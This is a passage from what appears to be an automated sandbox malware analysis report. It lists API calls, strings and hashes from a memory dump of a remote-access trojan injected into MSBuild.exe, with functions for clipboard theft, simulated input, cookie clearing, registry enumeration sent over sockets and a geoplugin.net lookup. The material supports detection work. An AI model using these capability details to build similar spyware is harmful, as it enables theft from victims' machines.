                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                • String ID: C
                                                • API String ID: 1679612858-1037565863
                                                • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tcp$udp
                                                • API String ID: 0-3725065008
                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                APIs
                                                • ExitThread.KERNEL32 ref: 004017F4
                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                • String ID: T=G$p[G$>G$>G
                                                • API String ID: 1596592924-2461731529
                                                • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                • String ID: .part
                                                • API String ID: 1303771098-3499674018
                                                • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                APIs
                                                  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                • _wcslen.LIBCMT ref: 0041A8F6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                • API String ID: 37874593-703403762
                                                • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                • __alloca_probe_16.LIBCMT ref: 004499E2
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                • __freea.LIBCMT ref: 00449B37
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • __freea.LIBCMT ref: 00449B40
                                                • __freea.LIBCMT ref: 00449B65
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 3864826663-0
                                                • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                APIs
                                                • SendInput.USER32 ref: 00418B08
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: InputSend$Virtual
                                                • String ID:
                                                • API String ID: 1167301434-0
                                                • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                APIs
                                                • OpenClipboard.USER32 ref: 00415A46
                                                • EmptyClipboard.USER32 ref: 00415A54
                                                • CloseClipboard.USER32 ref: 00415A5A
                                                • OpenClipboard.USER32 ref: 00415A61
                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                • CloseClipboard.USER32 ref: 00415A89
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                • String ID:
                                                • API String ID: 2172192267-0
                                                • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                APIs
                                                • _free.LIBCMT ref: 00447EBC
                                                • _free.LIBCMT ref: 00447EE0
                                                • _free.LIBCMT ref: 00448067
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                • _free.LIBCMT ref: 00448233
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                • String ID:
                                                • API String ID: 314583886-0
                                                • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                • Opcode Fuzzy Hash: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                APIs
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • _free.LIBCMT ref: 00444086
                                                • _free.LIBCMT ref: 0044409D
                                                • _free.LIBCMT ref: 004440BC
                                                • _free.LIBCMT ref: 004440D7
                                                • _free.LIBCMT ref: 004440EE
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: _free$AllocateHeap
                                                • String ID: J7D
                                                • API String ID: 3033488037-1677391033
                                                • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                APIs
                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                • __fassign.LIBCMT ref: 0044A180
                                                • __fassign.LIBCMT ref: 0044A19B
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: HE$HE
                                                • API String ID: 269201875-1978648262
                                                • Opcode ID: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                • Opcode Fuzzy Hash: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseEnumInfoOpenQuerysend
                                                • String ID: TUFTUF$>G$DG$DG
                                                • API String ID: 3114080316-344394840
                                                • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                APIs
                                                  • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                • API String ID: 1133728706-4073444585
                                                • Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                • Opcode Fuzzy Hash: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                • int.LIBCPMT ref: 0040FC0F
                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: P[G
                                                • API String ID: 2536120697-571123470
                                                • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                APIs
                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                Strings
                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                • String ID: http://geoplugin.net/json.gp
                                                • API String ID: 3121278467-91888290
                                                • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                APIs
                                                  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                • _free.LIBCMT ref: 0044FD29
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 0044FD34
                                                • _free.LIBCMT ref: 0044FD3F
                                                • _free.LIBCMT ref: 0044FD93
                                                • _free.LIBCMT ref: 0044FD9E
                                                • _free.LIBCMT ref: 0044FDA9
                                                • _free.LIBCMT ref: 0044FDB4
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                APIs
                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                  • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 1866151309-2070987746
                                                • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                • Opcode Fuzzy Hash: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                APIs
                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                • CoUninitialize.OLE32 ref: 0040688E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeObjectUninitialize_wcslen
